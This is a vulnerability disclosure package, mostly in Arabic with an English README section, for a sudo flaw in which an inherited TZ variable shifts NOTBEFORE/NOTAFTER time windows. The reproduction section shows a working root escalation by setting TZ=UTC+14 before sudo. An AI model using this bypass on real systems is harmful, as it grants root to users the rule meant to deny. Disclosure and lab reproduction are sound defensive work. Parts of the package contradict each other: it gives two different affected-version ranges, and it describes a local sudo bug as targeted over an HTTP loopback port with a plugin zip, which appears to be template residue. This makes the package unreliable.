
حزمة إفصاح و PoC لـ CVE-2026-96512، وهو تجاوز لنافذة زمنية في sudo NOTBEFORE/NOTAFTER TZ يتيح تصعيد الصلاحيات محليًا، مع إعادة إنتاج مخبرية وإرشادات الترقيع.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-96512
sudo 1.9.13p3 (Debian bookworm) — Sudo Project
تم العثور على ثغرة في sudo. عندما تستخدم قواعد sudoers قيود الوصول الزمنية NOTBEFORE أو NOTAFTER مع طوابع زمنية تفتقد مؤشر المنطقة الزمنية اللاحق Z، يعتمد تقييم الوقت على متغير البيئة TZ الموروث من المستخدم المستدعي.
| CVE | CVE-2026-96512 · CVE.org |
| CWE | CWE-863 |
| CVSS | High: 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| Product | sudo |
| Affected | جميع الإصدارات حتى 1.9.13p3 (Debian bookworm) (شاملة) |
| Patched | main commit 1820a34 (لا يوجد إصدار upstream بعد) وما بعده |
| Auth | authenticated (انظر خريطة المصدر) |
| License | GNU Affero GPL v3.0 |
| Lab | 127.0.0.1 فقط · حزمة إفصاح للمورّد/العميل، وليست ماسحًا ضوئيًا |
plugins/sudoers parse_gentime / gram.y timespec. الإصلاح sudo-project/sudo@1820a34 ينسخ environ من envp و unsetenv TZ.
LOCALTZ=UTC+14 sudo -n /usr/bin/idsudoers: labuser ALL=(root) NOPASSWD: NOTAFTER=<now-1h no Z> /usr/bin/idlabuser sudo -n /usr/bin/id -> denied (expired)TZ=UTC+14 sudo -n /usr/bin/idparse_gentime mktime honors POSIX TZ=UTC+14NOTAFTER epoch shifts +14h; command allowed as rootبدون TZ: sudo -n id مرفوض. مع TZ=UTC+14: uid=0(root).
افعل هذا أولًا: حدّث sudo إلى main commit 1820a34 (لا يوجد إصدار upstream بعد) أو أحدث.
تحقق بعد الترقية
CVE-2026-96512-Abraxas-Labs.py مقابل البناء المُرقّع: يجب ألا يظهر الشاهد المُعيَّن.إذا لم تستطع التحديث فورًا
استهدف فقط http://127.0.0.1:8088 (أو loopback الذي ربطته). لا توجّه هذا السكربت إلى الإنترنت.
python3 CVE-2026-96512-Abraxas-Labs.py
النجاح هو الشاهد أعلاه في جسم الاستجابة. صفحة HTML عامة بحالة 200 ليست هي.
حزمة loopback المستخدمة لإعادة الإنتاج. صور رسمية ما لم يبنِ Dockerfile في هذا المجلد من المصدر.
cd lab
docker compose up --force-recreate
اربط شجرة المنتج المتأثر بجانب Compose إذا كان ملف YAML يربط مجلدًا محليًا (plugin zip / source tag من جدول الإصدارات). لا تنشر شيئًا عدا 127.0.0.1.
github.com/sudo-project/sudo/commit/1820a349687522f51023d1ae5925125f59679a8c
Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null
# CVE-2026-96512
CWE: CWE-863
CVSS: High 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Red Hat).
## Description
sudoers `NOTBEFORE`/`NOTAFTER` timestamps without a trailing `Z` are converted with `mktime()`, which follows the caller’s `TZ`. A local user who is already named in such a rule can shift the window by up to ~25 hours (POSIX `TZ=UTC+14`) and run the allowed command outside the intended period. PAM authentication is unchanged.
## Product
sudo 1.9.13p3 on Debian bookworm (upstream 1.8.20–1.9.17p2). Fix in main `1820a34`; no upstream tarball yet at disclosure. Lab oracle is `uid=0(root)` via TZ, not a shell.
هذه الحزمة الإفصاحية مرخّصة بموجب GNU Affero General Public License v3.0. انظر LICENSE.
هذه الحزمة مخصّصة للمورّد، ومالك الموقع، والمختبرات المرخّصة. يتواصل السكربت مع 127.0.0.1. استخدامه ضد أنظمة لا تملكها غير مصرّح به من Abraxas Labs. لا ضمان.